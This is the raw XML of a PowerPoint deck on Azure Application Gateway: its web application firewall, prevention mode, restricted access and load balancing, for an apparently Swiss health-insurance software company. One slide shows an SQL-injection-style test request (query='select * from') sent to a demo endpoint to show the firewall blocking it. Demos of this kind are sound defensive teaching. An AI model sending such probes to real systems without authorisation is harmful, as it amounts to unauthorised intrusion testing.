        <p:spPr>
          <a:xfrm>
            <a:off x="10591086" y="5626491"/>
            <a:ext cx="282527" cy="282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Ellipse 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04797198-1848-C07C-6249-1A2E81B75AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10592567" y="5271749"/>
            <a:ext cx="282527" cy="2825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5" name="Ellipse 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011A7E65-1091-9C6B-8F26-D9DBA664C794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10602016" y="4561945"/>
            <a:ext cx="282527" cy="2825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85634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2E367-3710-DA42-65EF-C5AB47AB94E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A426A03E-533E-3CB9-0F88-F92D8BE89901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="2217905"/>
            <a:ext cx="10147311" cy="3842427"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The WAF protects against the following web vulnerabilities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL-injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other common attacks, such as command injection, HTTP request smuggling, HTTP response splitting, and remote file inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP protocol violations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP protocol anomalies, such as missing host user-agent and accept headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bots, crawlers, and scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common application misconfigurations (for example, Apache and IIS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8194A12-6BDC-C0CC-9547-AECA239976B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="6303922"/>
            <a:ext cx="7244675" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3942363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B449D44E-DBC8-952C-3CC6-ADC6DD9FC69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380" y="0"/>
            <a:ext cx="10335070" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="500849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A54305-C9B6-15CC-87D5-098A62615DD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>mode</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B52C5F-6C11-AAA9-4ABF-55F4566E5446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057482" y="2951900"/>
            <a:ext cx="7706597" cy="32843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feld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86008896-3A08-9D39-8C43-53EDE5CB4503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="1956817"/>
            <a:ext cx="10268712" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>GET URL Argument -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-CH" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-CH" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://agw-demo-02.northeurope.cloudapp.azure.com/?query=%27select%20*%20from%27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256443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57AD1D7F-0B3D-B906-A036-8F64408DC49B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>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l="1921" t="18137" r="3063" b="21372"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5678424" y="2450592"/>
            <a:ext cx="6032555" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F1C375-0809-33A6-0DCE-238AC94D2220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Swiss software provider for health insurance software solutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Inhaltsplatzhalter 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFACA34D-6165-65FB-DAC0-CA3D1B9F49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16353" y="361950"/>
            <a:ext cx="3694626" cy="475332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Diagramm 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BC0869-492A-87E4-30BE-3BBB466F7B48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3812367084"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="436758" y="2557947"/>
          <a:ext cx="5328920" cy="415408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3" name="Grafik 12" descr="Markierung mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536EDBC6-3D0E-3C06-2A43-9BA01CFF7833}"/>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8578525" y="3348382"/>
            <a:ext cx="682164" cy="682164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Textfeld 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06F26882-A9F3-3E4D-0EF7-E47BD30A5246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9009590" y="3678362"/>
            <a:ext cx="1058418" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Textfeld 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C719AFB-2C3B-4652-3AB1-05295A55364E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694676" y="6526771"/>
            <a:ext cx="3933956" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t>Image: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://svgsilh.com/de/image/1500642.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> (CC0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Textfeld 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF92AE80-6FBB-039F-D73D-EC1EBA48A852}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6915828" y="5417541"/>
            <a:ext cx="1104138" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Zermatt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Grafik 25" descr="Markierung mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF09F65-BBBD-9BBE-5973-2976A1D08413}"/>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8012537" y="4735377"/>
            <a:ext cx="682164" cy="682164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Grafik 26" descr="Markierung mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD515E4-FB44-4296-60F6-1094B742529B}"/>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7715082" y="5172142"/>
            <a:ext cx="682164" cy="682164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Textfeld 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AFAA47D-8FF5-3DE8-8DE0-8FC9A8E577C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7591806" y="4769751"/>
            <a:ext cx="681782" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Visp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802208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F7842D-65AB-826B-7B12-090DCC084244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069646" y="1092848"/>
            <a:ext cx="9958753" cy="680144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="all" dirty="0"/>
              <a:t>Protecting our System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C70825-A395-E900-1048-AD4148407910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261973" y="2359258"/>
            <a:ext cx="5846441" cy="3779632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3749084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8FC483E-1D4C-CC5A-36DD-985023FDA0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069646" y="1092848"/>
            <a:ext cx="9958753" cy="680144"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="all"/>
              <a:t>Restricted Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22">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1185999"/>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nhaltsplatzhalter 4" descr="Ein Bild, das Text enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC09BA4-43CF-BCA0-AAF9-F20B9D9D1F67}"/>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1181100" y="3181752"/>
            <a:ext cx="9847299" cy="2769570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3059014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72F93AF5-CFA9-CC16-0854-5D9BBD0A29AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787267" y="732312"/>
            <a:ext cx="8884206" cy="5963372"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85A9DD2E-DF75-77DE-7479-9AA73216CA11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252122" y="162316"/>
            <a:ext cx="4034707" cy="1294228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>setup</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741529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tones balancing on a wood">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{473564EC-B278-62B2-13F9-70F0727CB357}"/>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a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191979" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7241B3-63AE-6638-658E-D28831FF60E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074314" y="1088571"/>
            <a:ext cx="9958356" cy="2050908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" cap="all"/>
              <a:t>Load Balancing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1522342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362CB8-2D6E-E65B-D320-F64846CDCA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Balancing</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Textfeld 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52B5EEB-3C00-20C1-2A23-BFFCA51F9538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5869782"/>
            <a:ext cx="5391150" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/application-gateway-probe-overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Inhaltsplatzhalter 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB69496-8E37-A455-9C39-94EF98ED40D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
